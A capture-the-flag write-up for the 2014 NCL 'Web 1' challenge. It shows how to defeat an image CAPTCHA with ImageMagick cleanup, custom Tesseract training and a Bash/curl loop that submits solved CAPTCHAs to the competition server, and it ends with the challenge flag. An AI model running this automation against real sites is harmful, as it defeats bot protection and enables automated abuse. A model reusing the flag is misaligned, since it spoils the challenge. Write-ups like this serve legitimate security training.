2014 NCL Post Season Web 1 CAPTCHA Solution
The following solution is for the 2014 NCL Post Season event’s “Web 1” flag.
Requires:
Tesseract OCR v3.02
ImageMagick
curl
Bash
On Ubuntu 14.04 the Tesseract package exists, but due to a packaging error it includes none of the training tools, so compiling from source is necessary. Compiling Tesseract 3.02 from source also requires downloading and compiling Leptonica 1.70. Compiling instructions can be found here: https://code.google.com/p/tesseract-ocr/wiki/Compiling
Cleaning up the CAPTCHA with ImageMagick is fairly easy once you discover that the dark lines and noise can be eliminated with just two commands:
# remove the dark lines
convert captcha.png -opaque '#404040' cleaned_captcha.png
# remove blue noise
convert cleaned_captcha.png -opaque '#0000ff' cleaned_captcha.png
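The write-up does not say how the two colors were found. One possible way to look for candidates, offered here as an assumption rather than the author's method, is ImageMagick's color histogram, which lists each color in an image with its pixel count. The helper name `top_colors` is hypothetical.

```shell
#!/bin/bash
# Hypothetical helper (not from the original write-up): list the most
# frequent colors in an image, most common first.
# $1 = image file, $2 = how many colors to show (default 10)
top_colors() {
    convert "$1" -format '%c' histogram:info:- | sort -rn | head -n "${2:-10}"
}

# Usage, assuming captcha.png exists in the current directory:
#   top_colors captcha.png 5
```

Colors that cover many pixels but are neither the background nor the text are likely candidates for the `-opaque` cleanup.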
Now, with the image cleaned up, it is time for the OCR. With the default English training files, Tesseract was returning about 90-95% accuracy on the CAPTCHA’s font. That yields only 10-20 successful results before a failure resets the counter to zero, leaving the full 10,000 still to go. It is time to train Tesseract for the CAPTCHA font.
Training Tesseract OCR is a manual, multi-step process if you don’t have the font. With the font available, there is an automated solution. In this case, the font could not be found. Using ImageMagick’s convert utility to append 20-30 of the cleaned-up CAPTCHAs vertically lets you train on the most characters at one time. The first step in training is to create a box file from a TIFF of failed CAPTCHAs. I explain later how to append them together.
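To see why 90-95% accuracy falls short, treat each CAPTCHA as an independent trial with success probability p (a simplifying assumption, not something measured in this write-up). The expected number of attempts up to and including the first failure is then 1/(1-p), which lines up with the 10-20 figure. The function names below are illustrative only.

```shell
#!/bin/bash
# Expected number of attempts up to and including the first failure,
# assuming each CAPTCHA is solved independently with probability $1.
expected_attempts() {
    awk -v p="$1" 'BEGIN { printf "%.0f\n", 1 / (1 - p) }'
}

# Per-CAPTCHA accuracy needed for a 50% chance of $1 consecutive successes.
required_accuracy() {
    awk -v n="$1" 'BEGIN { printf "%.5f\n", exp(log(0.5) / n) }'
}

expected_attempts 0.90     # prints 10
expected_attempts 0.95     # prints 20
required_accuracy 10000    # prints 0.99993
```

Under this model, even an even chance of a 10,000-long streak needs the OCR to be right more than 99.99% of the time.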
tesseract -psm 6 eng.captcha.exp0.tif eng.captcha.exp0 batch.nochop makebox
Using the utility Cowboxer (works in WINE), I was able to edit the box file and fix any mistakes Tesseract made. Now it is time to train Tesseract using the corrected box file.
tesseract -psm 6 eng.captcha.exp0.tif eng.captcha.exp0 box.train
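Each line of a Tesseract 3 box file holds a character followed by its left, bottom, right, and top coordinates and a page number. A quick tally of the first column shows which characters the corrected box file covers and how often, which can help spot characters that still lack training samples. This is a minimal sketch; the helper name `box_char_counts` is hypothetical.

```shell
#!/bin/bash
# Hypothetical helper: count how often each character appears in a box file,
# most frequent first.
# $1 = box file, e.g. eng.captcha.exp0.box
box_char_counts() {
    cut -d' ' -f1 "$1" | sort | uniq -c | sort -rn
}

# Usage, assuming the box file from the step above exists:
#   box_char_counts eng.captcha.exp0.box
```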
Now it is only a matter of running several other commands and copying the combined result file to the tessdata directory. For brevity’s sake I won’t describe what the commands do. More information can be found here: https://code.google.com/p/tesseract-ocr/wiki/TrainingTesseract3
echo "captcha 0 0 0 0 0" > font_properties
unicharset_extractor eng.captcha.exp0.box
# for 2nd training session and after include previous box files
# unicharset_extractor eng.captcha.exp0.box eng.captcha.exp1.box eng.captcha.exp2.box
shapeclustering -F font_properties -U unicharset eng.captcha.exp0.tr
mftraining -F font_properties -U unicharset -O eng.unicharset eng.captcha.exp0.tr
cntraining eng.captcha.exp0.tr
# for 2nd training session and after include previous training files
# shapeclustering -F font_properties -U unicharset eng.captcha.exp0.tr eng.captcha.exp1.tr eng.captcha.exp2.tr
# mftraining -F font_properties -U unicharset -O eng.unicharset eng.captcha.exp0.tr eng.captcha.exp1.tr eng.captcha.exp2.tr
# cntraining eng.captcha.exp0.tr eng.captcha.exp1.tr eng.captcha.exp2.tr
mv shapetable eng.shapetable
mv inttemp eng.inttemp
mv pffmtable eng.pffmtable
mv normproto eng.normproto
combine_tessdata eng.
cp eng.traineddata /usr/local/share/tessdata
Training Tesseract OCR with appended failed CAPTCHAs will help improve accuracy after the first training session.
# append failed CAPTCHAs vertically for training
convert failed*.png -append eng.captcha.exp0.png
# resize to 1000 pixel width while maintaining aspect ratio
convert eng.captcha.exp0.png -resize 1000 eng.captcha.exp0.tif
After a few training sessions, the CAPTCHA failure rate is much lower, but still not good enough to reach 10,000 consecutive correct outputs. During training on the appended failures, however, there were no errors. To emulate that, the current CAPTCHA has to be appended with additional ones before running it through Tesseract. Then just pipe the output through the ‘tr’ and ‘cut’ commands to keep only the current CAPTCHA’s characters.
CAPTCHA=`cat ocr_captcha_result.txt | tr -d '\n'| tr -d ' '| cut -c 1-6`
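As a small illustration of that cleanup, suppose Tesseract writes one line per stacked CAPTCHA, possibly with stray spaces. The sample text below is made up, the six-character length is inferred from the `cut -c 1-6` above, and the function name `first_captcha` is hypothetical.

```shell
#!/bin/bash
# Hypothetical wrapper around the same tr/cut pipeline.
# $1 = Tesseract output file
first_captcha() {
    # strip spaces and newlines, then keep the first six characters
    tr -d ' \n' < "$1" | cut -c 1-6
}

# Made-up OCR output: the current CAPTCHA first, then the appended ones.
printf 'aB3 kQ9\nxY7mN2\nqR5tU8\n' > sample_result.txt
first_captcha sample_result.txt    # prints aB3kQ9
```

Because the current CAPTCHA is first in the appended image, its characters come first in the output, so the first six characters are all that is needed.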
With Tesseract trained, it is now time to automate grabbing the CAPTCHAs and decoding them.
for i in {0..10001}
do
    if [ ${i} -lt 1 ]; then
        # start the session
        curl -b cookies.txt -c cookies.txt -k \
            --data "username=user&password=test" \
            https://23.23.158.181/signup.php
        continue;
    fi
    # submit captcha ocr value to server
    curl -b cookies.txt -c cookies.txt -k -X POST \
        --data "input=${CAPTCHA}&flag=1&submit=submit" \
        https://23.23.158.181/main.php
    # download new captcha from server
    curl -b cookies.txt -c cookies.txt -k \
        https://23.23.158.181/captcha.png > captcha.png
    # remove the dark lines
    convert captcha.png -opaque '#404040' cleaned_captcha.png
    # remove blue noise
    convert cleaned_captcha.png -opaque '#0000ff' cleaned_captcha.png
    # append other cleaned captchas vertically to improve ocr accuracy
    convert cleaned_captcha.png \
        additional_captcha.png \
        additional_captcha_2.png \
        -append ocr_captcha.png
    # increase size for ocr accuracy
    convert ocr_captcha.png -resize 1000 final_ocr_captcha.tif
    # run captcha through tesseract ocr
    tesseract -psm 6 final_ocr_captcha.tif ocr_captcha_result
    # clean up and grab only first captcha values
    CAPTCHA=`cat ocr_captcha_result.txt | tr -d '\n'| tr -d ' '| cut -c 1-6`
done
At this point, you should be well on your way to 10,000 consecutive CAPTCHA form submissions. If there is any issue with training on failed ones, this code added to the form submission line should help identify and save the failed CAPTCHAs for additional training.
# submit captcha ocr value to server
curl -b cookies.txt -c cookies.txt -k -X POST \
    --data "input=${CAPTCHA}&flag=1&submit=submit" \
    https://23.23.158.181/main.php > flagdata.txt
if grep -Fq "You have failed" flagdata.txt
then
    echo "Failed captcha ${CAPTCHA}"
    cp captcha.png "failed-${CAPTCHA}.png"
    # will display the failed CAPTCHA using Image Magick's display command and keep the script running
    # comment this if experiencing a high failure rate
    display "failed-${CAPTCHA}.png" &
fi
The looping video below shows CAPTCHAs 9,997, 9,998, 9,999, and 10,000 being solved:
Flag: MyVisionIs2020
Written and Solved by Ryan Lavelle